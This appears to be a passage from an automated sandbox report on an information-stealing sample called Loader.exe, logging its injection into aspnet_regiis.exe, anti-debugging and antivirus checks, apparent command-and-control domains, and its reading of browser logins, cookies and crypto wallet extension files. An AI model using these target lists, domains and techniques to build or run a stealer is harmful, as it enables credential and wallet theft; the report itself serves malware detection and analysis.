                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | API call chain: ExitProcess graph end node graph_3-15073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C6E110 LdrInitializeThunk
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE4F194 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE51D62 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE52FA1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE4EC67 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE5167C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\Loader.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\Loader.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C30000 protect: page execute and read and write
                Source: C:\Users\user\Desktop\Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C30000 value starts with: 4D5A
                Source: Loader.exe, 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp | String found in binary or memory: hummskitnj.buzz
                Source: Loader.exe, 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp | String found in binary or memory: cashfuzysao.buzz
                Source: Loader.exe, 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp | String found in binary or memory: appliacnesot.buzz
                Source: Loader.exe, 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp | String found in binary or memory: screwamusresz.buzz
                Source: Loader.exe, 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp | String found in binary or memory: inherineau.buzz
                Source: Loader.exe, 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp | String found in binary or memory: scentniej.buzz
                Source: Loader.exe, 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp | String found in binary or memory: rebuildeso.buzz
                Source: Loader.exe, 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp | String found in binary or memory: prisonyfork.buzz
                Source: C:\Users\user\Desktop\Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C30000
                Source: C:\Users\user\Desktop\Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C31000
                Source: C:\Users\user\Desktop\Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C72000
                Source: C:\Users\user\Desktop\Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C75000
                Source: C:\Users\user\Desktop\Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C83000
                Source: C:\Users\user\Desktop\Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 30A5008
                Source: C:\Users\user\Desktop\Loader.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE4F358 cpuid
                Source: C:\Users\user\Desktop\Loader.exe | Queries volume information: C:\Users\user\Desktop\Loader.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE4EDDB GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: aspnet_regiis.exe, 00000003.00000002.2243161469.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220755214.0000000005C80000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 5772, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.binstr, type: MEMORYSTR
Source: aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"WalB
Source: aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: 20},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"b
Source: aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: age.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexR
Source: aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: age.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexR
Source: aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wa
Source: aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wa
Source: aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wa
Source: aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflа
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
